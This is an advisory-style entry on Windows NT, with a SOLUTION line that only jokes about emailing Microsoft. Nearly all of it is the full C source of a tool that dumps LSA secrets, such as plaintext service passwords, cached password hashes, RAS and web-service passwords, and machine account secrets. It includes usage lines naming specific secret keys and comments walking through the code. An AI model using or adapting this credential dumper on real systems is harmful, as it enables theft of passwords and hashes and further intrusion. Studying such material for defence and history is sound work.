COMMAND

    LSA

SYSTEMS AFFECTED

    Win NT

PROBLEM

    Paul Ashton posted the following. Following on from the service
    password issue, here's a little program that will dump various
    LSA secrets such as service passwords (plain text), cached
    password hashes of the last users to log in to a machine, FTP,
    WEB, etc. plaintext passwords, RAS dial-up account names,
    passwords etc., workstation passwords for domain access, etc.

    Run as: prog _sc_schedule [machine], prog nl$1, prog  w3_root_data
    or  any  other  registry  key  under NTLM\security\policy\secrets.
    Exploit follows:

    #include <windows.h>
    #include <stdio.h>

    #include "ntsecapi.h"
    /* Abort with the failing source line when a call reports failure.  The
       trailing `else` swallows the `;` after AST(x); so the macro nests
       safely inside an unbraced if/else.  exit() is used without
       <stdlib.h>, so it presumably arrives through <windows.h>. */
    #define AST(x) if (!(x)) {printf("Failed line %d\n", __LINE__);exit(1);} else
    /* Old-style declaration for the CRT's write(): the real function returns
       int, not void, and takes (fd, buf, count).  It only compiles because no
       header here declares write(); NOTE(review): <io.h> and _write() would
       give a checked prototype. */
    void write();

    /*
     * Wrap a NUL-terminated wide string in an LSA_UNICODE_STRING.
     *
     * Length is the byte count without the terminator, MaximumLength the
     * byte count with it.  The descriptor is a single static object, so
     * every call overwrites the previous result: consume the returned
     * pointer before calling str() again.  The length fields are 16-bit,
     * so byte counts above 65535 wrap silently.
     */
    PLSA_UNICODE_STRING
    str(LPWSTR x)
    {
        static LSA_UNICODE_STRING desc;
        size_t chars = wcslen(x);

        desc.Length = chars * sizeof(WCHAR);
        desc.MaximumLength = (chars + 1) * sizeof(WCHAR);
        desc.Buffer = x;
        return &desc;
    }

    /*
     * Usage: prog <secret-name> [machine]
     *
     * Opens the LSA policy on the named machine (an empty host string when
     * no machine is given), reads the private-data secret called
     * <secret-name> and writes its raw bytes to stdout.  Any API failure
     * aborts through AST() with the failing line number.
     */
    int _cdecl
    main(int argc, char *argv[])
    {
        LSA_HANDLE pol;
        PLSA_UNICODE_STRING foo;
        LSA_OBJECT_ATTRIBUTES attrs;
        WCHAR keyname[256]=L"";
        WCHAR host[256]=L"";

        /* argv[1] is used without an argc check, so running with no
           argument dereferences a null pointer.  %hS widens the narrow
           argument; wsprintfW takes no buffer size, so an argument of 256
           or more characters overflows these arrays. */
        wsprintfW(keyname, L"%hS", argv[1]);
        if(argc == 3) wsprintfW(host, L"%hS", argv[2]);
        /* The object attributes must be zeroed; the API otherwise ignores
           their contents. */
        memset(&attrs, 0, sizeof(attrs));
        /* str() hands back one static descriptor, so each result has to be
           consumed before the next call -- this ordering does that. */
        AST(!LsaOpenPolicy(str(host), &attrs, 0, &pol));
        AST(!LsaRetrievePrivateData(pol, str(keyname), &foo));
        /* Length is a byte count.  This call goes through the void write()
           declaration above rather than a real prototype.  foo is never
           released with LsaFreeMemory, and pol is not closed when the
           retrieval AST() exits early; process exit reclaims both. */
        write(1, foo->Buffer, foo->Length);
        LsaClose(pol);
        exit(0);
    }

SOLUTION

    mail [someone]@microsoft.com and kindly ask them for help.